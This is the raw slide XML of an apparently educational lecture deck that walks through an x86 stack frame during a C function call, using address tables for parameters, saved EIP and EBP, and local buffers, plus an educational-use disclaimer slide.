            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="327" name="Google Shape;327;g24e5311e72c_0_218"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1898650" y="16700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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1085850"/>
                <a:gridCol w="1428750"/>
              </a:tblGrid>
              <a:tr h="177800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="248920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Address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Contents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65100" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="11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0xfffffffc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0xbffff364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00000003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0xbffff360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00000002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0xbffff35C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00000001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35575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0xbffff358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0xbffff354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0xbffff350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0xbffff34c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0xbffff348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0xbffff344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0xbffff340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0x00000004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57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0x00000000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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Google Shape;328;g24e5311e72c_0_218"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="1807493"/>
            <a:ext cx="913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Top of Memory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24e5311e72c_0_218"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="2485673"/>
            <a:ext cx="1159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Start of stack frame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24e5311e72c_0_218"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="2961382"/>
            <a:ext cx="12498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Noto Sans Symbols"/>
                <a:ea typeface="Noto Sans Symbols"/>
                <a:cs typeface="Noto Sans Symbols"/>
                <a:sym typeface="Noto Sans Symbols"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a: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ESP (Stack Pointer)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g24e5311e72c_0_218"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="5208553"/>
            <a:ext cx="11418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Bottom of Memory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g24e5311e72c_0_218"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2669539" y="5828567"/>
            <a:ext cx="52998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entury Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:rPr>
              <a:t>Push parameters (from right to left)</a:t>
            </a:r>
            <a:endParaRPr sz="25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33" name="Google Shape;333;g24e5311e72c_0_218"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="1466005"/>
            <a:ext cx="24798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0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void main()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39419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myFunction (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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,2,3);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Google Shape;334;g24e5311e72c_0_218"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="2500293"/>
            <a:ext cx="38664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925">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="508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myFunction (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 num1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int num2, int num3)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spcBef>
                <a:spcPts val="215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39419" marR="1605280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 buffer1[8]; char buffer2[12];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spcBef>
                <a:spcPts val="254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Google Shape;335;g24e5311e72c_0_218"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2593339" y="1298133"/>
            <a:ext cx="9735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Memory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4e5311e72c_0_233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Stack: Calling a Function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="342" name="Google Shape;342;g24e5311e72c_0_233"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1898650" y="16700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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1085850"/>
                <a:gridCol w="1428750"/>
              </a:tblGrid>
              <a:tr h="177800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="248920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Address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Contents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65100" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="11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0xfffffffc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0xbffff364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00000003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0xbffff360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00000002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0xbffff35C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00000001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35575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0xbffff358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saved EIP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0xbffff354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0xbffff350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0xbffff34c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0xbffff348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0xbffff344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0xbffff340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57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0x00000004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0x00000000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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Google Shape;343;g24e5311e72c_0_233"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="1807493"/>
            <a:ext cx="913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Top of Memory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24e5311e72c_0_233"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="2485673"/>
            <a:ext cx="1159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Start of stack frame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24e5311e72c_0_233"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="3187442"/>
            <a:ext cx="12498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Noto Sans Symbols"/>
                <a:ea typeface="Noto Sans Symbols"/>
                <a:cs typeface="Noto Sans Symbols"/>
                <a:sym typeface="Noto Sans Symbols"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a: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ESP (Stack Pointer)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g24e5311e72c_0_233"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="5289832"/>
            <a:ext cx="11418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Bottom of Memory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g24e5311e72c_0_233"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2821939" y="5981955"/>
            <a:ext cx="53790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entury Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:rPr>
              <a:t>Push EIP and set EIP to address of MyFunction</a:t>
            </a:r>
            <a:endParaRPr sz="19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8" name="Google Shape;348;g24e5311e72c_0_233"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="1466005"/>
            <a:ext cx="24798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0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void main()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39419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myFunction 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(1,2,3);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Google Shape;349;g24e5311e72c_0_233"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="2500293"/>
            <a:ext cx="38664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925">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="508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myFunction (int num1, int num2, int num3)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spcBef>
                <a:spcPts val="215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39419" marR="1604645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 buffer1[8]; char buffer2[12];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spcBef>
                <a:spcPts val="254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0" name="Google Shape;350;g24e5311e72c_0_233"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2593339" y="1298133"/>
            <a:ext cx="9735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Memory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4e5311e72c_0_248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Stack: Calling a Function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="357" name="Google Shape;357;g24e5311e72c_0_248"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1898650" y="16700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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1085850"/>
                <a:gridCol w="1428750"/>
              </a:tblGrid>
              <a:tr h="177800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="248920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Address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Contents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65100" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="11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0xfffffffc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0xbffff364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00000003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0xbffff360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00000002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0xbffff35C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00000001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35575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0xbffff358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saved EIP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0xbffff354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saved EBP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0xbffff350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0xbffff34c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0xbffff348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0xbffff344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0xbffff340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57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0x00000004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0x00000000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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Google Shape;358;g24e5311e72c_0_248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="1807493"/>
            <a:ext cx="913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Top of Memory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24e5311e72c_0_248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="2485673"/>
            <a:ext cx="1159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Start of stack frame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24e5311e72c_0_248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="3071684"/>
            <a:ext cx="12498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725"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Noto Sans Symbols"/>
                <a:ea typeface="Noto Sans Symbols"/>
                <a:cs typeface="Noto Sans Symbols"/>
                <a:sym typeface="Noto Sans Symbols"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a: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ESP (Stack Pointer)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24e5311e72c_0_248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="5289832"/>
            <a:ext cx="11418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Bottom of Memory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g24e5311e72c_0_248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2669539" y="5833025"/>
            <a:ext cx="5090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entury Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:rPr>
              <a:t>Push EBP and set EBP to ESP</a:t>
            </a:r>
            <a:endParaRPr sz="28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63" name="Google Shape;363;g24e5311e72c_0_248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="1466005"/>
            <a:ext cx="24798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0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void main()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39419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myFunction (1,2,3);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4" name="Google Shape;364;g24e5311e72c_0_248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="2500293"/>
            <a:ext cx="38664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925">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="508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myFunction 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(int num1, int num2, int num3)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spcBef>
                <a:spcPts val="215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39419" marR="1605280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 buffer1[8]; char buffer2[12];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spcBef>
                <a:spcPts val="254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5" name="Google Shape;365;g24e5311e72c_0_248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2593339" y="1298133"/>
            <a:ext cx="9735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Memory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4e5311e72c_0_263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Stack: Calling a Function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="372" name="Google Shape;372;g24e5311e72c_0_263"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1898650" y="16700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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1085850"/>
                <a:gridCol w="1428750"/>
              </a:tblGrid>
              <a:tr h="177800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="248920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Address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Contents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65100" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="11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0xfffffffc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0xbffff364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00000003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0xbffff360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00000002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0xbffff35C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00000001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35575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0xbffff358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saved EIP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0xbffff354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saved EBP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0xbffff350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Buffer1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0xbffff34c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Buffer1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0xbffff348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0xbffff344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0xbffff340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57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0x00000004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0x00000000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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Google Shape;373;g24e5311e72c_0_263"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="1807493"/>
            <a:ext cx="913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Top of Memory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g24e5311e72c_0_263"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="2485673"/>
            <a:ext cx="1159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Start of stack frame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g24e5311e72c_0_263"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="3071684"/>
            <a:ext cx="12294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725"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Noto Sans Symbols"/>
                <a:ea typeface="Noto Sans Symbols"/>
                <a:cs typeface="Noto Sans Symbols"/>
                <a:sym typeface="Noto Sans Symbols"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a: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EBP (Base Pointer)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g24e5311e72c_0_263"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4470232" y="3875782"/>
            <a:ext cx="12498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Noto Sans Symbols"/>
                <a:ea typeface="Noto Sans Symbols"/>
                <a:cs typeface="Noto Sans Symbols"/>
                <a:sym typeface="Noto Sans Symbols"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a: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ESP (Stack Pointer)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g24e5311e72c_0_263"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="5289832"/>
            <a:ext cx="11418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Bottom of Memory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g24e5311e72c_0_263"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2669539" y="5833025"/>
            <a:ext cx="52077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entury Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:rPr>
              <a:t>Push local variables in function</a:t>
            </a:r>
            <a:endParaRPr sz="28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9" name="Google Shape;379;g24e5311e72c_0_263"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="1466005"/>
            <a:ext cx="24798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0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void main()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39419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myFunction (1,2,3);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0" name="Google Shape;380;g24e5311e72c_0_263"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="2500293"/>
            <a:ext cx="38664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925">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="508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myFunction (int num1, int num2, int num3)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spcBef>
                <a:spcPts val="215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39419" marR="1604645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char buffer1[8]; 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 buffer2[12];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spcBef>
                <a:spcPts val="254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1" name="Google Shape;381;g24e5311e72c_0_263"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2593339" y="1298133"/>
            <a:ext cx="9735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Memory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e5311e72c_0_0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Disclaimer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;g24e5311e72c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 educational purposes only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All content discussed is derived from public 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This follow-along lecture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>requires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> great attention to detail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4e5311e72c_0_279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Stack: Calling a Function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="388" name="Google Shape;388;g24e5311e72c_0_279"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1898650" y="16700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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1085850"/>
                <a:gridCol w="1428750"/>
              </a:tblGrid>
              <a:tr h="177800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="248920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Address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Contents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65100" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="11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0xfffffffc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0xbffff364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00000003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0xbffff360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00000002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0xbffff35C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00000001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35575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0xbffff358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saved EIP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0xbffff354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saved EBP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0xbffff350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Buffer1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0xbffff34c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Buffer1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0xbffff348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Buffer2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0xbffff344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Buffer2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0xbffff340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Buffer2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57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0x00000004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0x00000000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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Google Shape;389;g24e5311e72c_0_279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="1807493"/>
            <a:ext cx="913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Top of Memory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g24e5311e72c_0_279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="2485673"/>
            <a:ext cx="1159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Start of stack frame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g24e5311e72c_0_279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="3071684"/>
            <a:ext cx="12294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725"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Noto Sans Symbols"/>
                <a:ea typeface="Noto Sans Symbols"/>
                <a:cs typeface="Noto Sans Symbols"/>
                <a:sym typeface="Noto Sans Symbols"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a: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EBP (Base Pointer)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g24e5311e72c_0_279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="4574282"/>
            <a:ext cx="12498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Noto Sans Symbols"/>
                <a:ea typeface="Noto Sans Symbols"/>
                <a:cs typeface="Noto Sans Symbols"/>
                <a:sym typeface="Noto Sans Symbols"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a: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ESP (Stack Pointer)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g24e5311e72c_0_279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="5289832"/>
            <a:ext cx="11418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Bottom of Memory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g24e5311e72c_0_279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2669539" y="5833025"/>
            <a:ext cx="52077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entury Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:rPr>
              <a:t>Push local variables in function</a:t>
            </a:r>
            <a:endParaRPr sz="28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95" name="Google Shape;395;g24e5311e72c_0_279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="1466005"/>
            <a:ext cx="24798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0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void main()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39419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myFunction (1,2,3);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6" name="Google Shape;396;g24e5311e72c_0_279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="2500293"/>
            <a:ext cx="38664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925">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="508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myFunction (int num1, int num2, int num3)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spcBef>
                <a:spcPts val="215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39419" marR="1604645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 buffer1[8];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char buffer2[12];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spcBef>
                <a:spcPts val="254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7" name="Google Shape;397;g24e5311e72c_0_279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2593339" y="1298133"/>
            <a:ext cx="9735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Memory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4e5311e72c_0_295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Stack: Calling a Function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="404" name="Google Shape;404;g24e5311e72c_0_295"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1898650" y="16700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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1085850"/>
                <a:gridCol w="1428750"/>
              </a:tblGrid>
              <a:tr h="177800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="248920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Address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Contents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65100" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="11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0xfffffffc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0xbffff364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00000003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0xbffff360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00000002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0xbffff35C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00000001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35575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0xbffff358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saved EIP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0xbffff354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saved EBP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0xbffff350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Buffer1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0xbffff34c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Buffer1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0xbffff348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Buffer2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0xbffff344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Buffer2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0xbffff340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Buffer2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57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0x00000004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0x00000000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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="Google Shape;405;g24e5311e72c_0_295"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="1807493"/>
            <a:ext cx="913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Top of Memory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g24e5311e72c_0_295"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="2485673"/>
            <a:ext cx="1159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Start of stack frame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g24e5311e72c_0_295"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="3071684"/>
            <a:ext cx="12294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725"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Noto Sans Symbols"/>
                <a:ea typeface="Noto Sans Symbols"/>
                <a:cs typeface="Noto Sans Symbols"/>
                <a:sym typeface="Noto Sans Symbols"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a: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EBP (Base Pointer)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g24e5311e72c_0_295"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="4574282"/>
            <a:ext cx="12498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Noto Sans Symbols"/>
                <a:ea typeface="Noto Sans Symbols"/>
                <a:cs typeface="Noto Sans Symbols"/>
                <a:sym typeface="Noto Sans Symbols"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a: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ESP (Stack Pointer)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g24e5311e72c_0_295"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="5289832"/>
            <a:ext cx="11418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Bottom of Memory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g24e5311e72c_0_295"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2669539" y="5832349"/>
            <a:ext cx="63252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entury Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:rPr>
              <a:t>Pop saved EIP (return address) and set EIP = saved EIP</a:t>
            </a:r>
            <a:endParaRPr sz="19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11" name="Google Shape;411;g24e5311e72c_0_295"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="1466005"/>
            <a:ext cx="24798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0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void main()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39419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myFunction (1,2,3);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2" name="Google Shape;412;g24e5311e72c_0_295"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="2500293"/>
            <a:ext cx="38664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925">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="508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myFunction (int num1, int num2, int num3)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spcBef>
                <a:spcPts val="215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39419" marR="1604645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 buffer1[8]; char buffer2[12];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spcBef>
                <a:spcPts val="254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Google Shape;413;g24e5311e72c_0_295"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2593339" y="1298133"/>
            <a:ext cx="9735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Memory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4e5311e72c_0_311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Stack: Calling a Function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="420" name="Google Shape;420;g24e5311e72c_0_311"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1898650" y="16700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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1085850"/>
                <a:gridCol w="1428750"/>
              </a:tblGrid>
              <a:tr h="177800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="248920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Address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Contents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65100" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="11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0xfffffffc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0xbffff364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sng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00000003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0xbffff360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sng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00000002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0xbffff35C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sng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00000001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35575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0xbffff358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sng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saved EIP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0xbffff354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sng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saved EBP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0xbffff350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sng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Buffer1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0xbffff34c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sng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Buffer1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0xbffff348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sng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Buffer2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0xbffff344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sng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Buffer2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0xbffff340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sng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Buffer2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57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0x00000004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0x00000000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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Google Shape;421;g24e5311e72c_0_311"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="1807493"/>
            <a:ext cx="913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Top of Memory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g24e5311e72c_0_311"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="2248371"/>
            <a:ext cx="12807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31115" lvl="0" marL="12700" marR="508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&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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ESP (Stack Pointer) </a:t>
            </a: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Start of stack frame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g24e5311e72c_0_311"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="5289832"/>
            <a:ext cx="11418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Bottom of Memory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g24e5311e72c_0_311"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2669539" y="5825519"/>
            <a:ext cx="58281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375">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="5080" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="7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latin typeface="Century Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:rPr>
              <a:t>Update ESP to effectively forget stack frame used for myFunction</a:t>
            </a:r>
            <a:endParaRPr sz="185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5" name="Google Shape;425;g24e5311e72c_0_311"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
